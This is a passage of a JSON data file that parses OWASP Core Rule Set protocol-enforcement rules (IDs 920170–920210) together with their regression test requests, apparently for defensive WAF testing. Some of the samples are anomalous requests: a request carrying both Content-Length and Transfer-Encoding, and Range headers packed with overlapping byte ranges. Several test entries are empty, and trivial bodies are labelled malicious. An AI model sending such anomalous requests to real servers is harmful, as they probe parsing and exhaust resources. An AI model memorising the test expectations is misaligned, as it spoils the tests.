"Content-Type": "application/x-www-form-urlencoded", "Content-Length": "0", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920170 ] }, "malicious_patterns": [] }, { "description": "GET or HEAD Request with Body Content (920170) from old modsec regressions", "test_id": 6, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "abc" }, "expected": { "should_block": true, "rule_ids": [ 920170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "abc" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 174, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:GET|HEAD)$", "actions": [ { "act_name": "id", "lineno": 175, "act_quote": "no_quote", "act_arg": "920170", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 176, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 177, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 178, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 179, "act_quote": "quotes", "act_arg": "GET or HEAD Request with Body Content", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 180, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 181, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 182, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 183, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 184, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 185, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 186, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 187, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 188, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 189, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 190, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 191, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 174 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@rx", "argument": "^0?$", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 192, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^0?$", "actions": [ { "act_name": "t", "lineno": 193, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 194, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 192 } }, { "rule_id": "920171", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:GET|HEAD)$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "GET or HEAD Request with Transfer-Encoding", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": null, "headers": {}, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920171 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": null, "headers": {}, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920171 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": null, "headers": {}, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920171 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 200, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:GET|HEAD)$", "actions": [ { "act_name": "id", "lineno": 201, "act_quote": "no_quote", "act_arg": "920171", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 202, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 203, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 204, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 205, "act_quote": "quotes", "act_arg": "GET or HEAD Request with Transfer-Encoding", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 206, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 207, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 208, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 209, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 210, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 211, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 212, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 213, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 214, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 215, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 216, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 217, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 200 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Transfer-Encoding", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 218, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Transfer-Encoding", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "t", "lineno": 219, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 220, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 218 } }, { "rule_id": "920180", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_PROTOCOL", "part": "", "negated": false } ], "operator": { "type": "@within", "argument": "HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "POST without Content-Length and Transfer-Encoding headers", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test" }, "expected": { "should_block": true, "rule_ids": [ 920180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test" } ] }, { "description": "", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "hi=test" }, "expected": { "should_block": false, "rule_ids": [ 920180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "hi=test" } ] }, { "description": "POST request missing Content-Length Header (920180) from old modsec regressions", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920180 ] }, "malicious_patterns": [] }, { "description": "Ignore check of CT header if protocol is HTTP/2 - Without content-length header.", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920180 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 241, "variables": [ { "variable": "REQUEST_PROTOCOL", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@within", "operator_argument": "HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0", "actions": [ { "act_name": "id", "lineno": 242, "act_quote": "no_quote", "act_arg": "920180", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 243, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 244, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 245, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 246, "act_quote": "quotes", "act_arg": "POST without Content-Length and Transfer-Encoding headers", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 247, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 248, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 249, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 250, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 251, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 252, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 253, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 254, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 255, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 256, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 257, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 258, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 241 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_METHOD", "part": "", "negated": false } ], "operator": { "type": "@streq", "argument": "POST", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 259, "variables": [ { "variable": "REQUEST_METHOD", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@streq", "operator_argument": "POST", "actions": [ { "act_name": "chain", "lineno": 260, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 259 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 261, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "chain", "lineno": 262, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 261 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Transfer-Encoding", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 263, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Transfer-Encoding", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "setvar", "lineno": 264, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 263 } }, { "rule_id": "920181", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Transfer-Encoding", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Content-Length and Transfer-Encoding headers present", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "POST", "uri": "/anything", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Content-Length": 7, "Content-Type": "application/x-www-form-urlencoded", "Transfer-Encoding": "chunked", "User-Agent": "OWASP CRS test agent" }, "data": "7\r\nfoo=bar\r\n0\r\n\r\n" }, "expected": { "should_block": false, "rule_ids": [ 920181 ] }, "malicious_patterns": [ { "location": "post_body", "value": "7\r\nfoo=bar\r\n0\r\n\r\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 273, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Transfer-Encoding", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 274, "act_quote": "no_quote", "act_arg": "920181", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 275, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 276, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 277, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 278, "act_quote": "quotes", "act_arg": "Content-Length and Transfer-Encoding headers present", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 279, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 280, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 281, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 282, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 283, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 284, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 285, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 286, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 287, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 288, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 289, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": true, "oplineno": 273 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Length", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": true } }, "transformations": [ "none" ], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 290, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Length", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "t", "lineno": 291, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 292, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 290 } }, { "rule_id": "920190", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Range", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Request-Range", "negated": false } ], "operator": { "type": "@rx", "argument": "(\\d+)-(\\d+)", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Range: Invalid Last Byte Value", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Range": "0-1", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920190 ] }, "malicious_patterns": [] }, { "description": "Range: Invalid Last Byte Value (920190) from old modsec regressions", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Connection": "close", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Range": "bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920190 ] }, "malicious_patterns": [] }, { "description": "Status Page Test - Request-Range header field with range end less than range start", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Request-Range": "bytes=64-0" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920190 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 310, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Range", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Request-Range", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(\\d+)-(\\d+)", "actions": [ { "act_name": "id", "lineno": 311, "act_quote": "no_quote", "act_arg": "920190", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 312, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 313, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 314, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 315, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 316, "act_quote": "quotes", "act_arg": "Range: Invalid Last Byte Value", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 317, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 318, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 319, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 320, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 321, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 322, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 323, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 324, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 325, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 326, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 327, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 328, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 310 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "2", "negated": false } ], "operator": { "type": "@lt", "argument": "%{tx.1}", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 329, "variables": [ { "variable": "TX", "variable_part": "2", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "%{tx.1}", "actions": [ { "act_name": "setvar", "lineno": 330, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 329 } }, { "rule_id": "920210", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Connection", "negated": false } ], "operator": { "type": "@rx", "argument": "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Multiple/Conflicting Connection Header Data Found", "logdata": "%{MATCHED_VAR}", "version": 